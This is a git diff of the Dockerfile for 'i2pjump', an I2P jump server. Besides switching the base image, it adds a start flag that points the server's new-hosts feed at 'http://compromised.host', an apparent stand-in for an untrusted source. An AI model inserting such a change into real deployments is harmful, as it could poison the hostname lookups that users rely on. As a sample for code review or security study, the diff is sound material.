diff --git a/Dockerfile b/Dockerfile
index 094fcef..574925e 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,7 +1,7 @@
 # i2pjump - Run an I2P Jump Server
 # License - This is free and unencumbered software released into the public domain.
 # Running - See README.md
-FROM python:3-alpine
+FROM python:3-buster
 WORKDIR /i2pjump
 COPY i2pjump.py .
-CMD python i2pjump.py --host 0.0.0.0
+CMD python i2pjump.py --host 0.0.0.0 --new-hosts=http://compromised.host
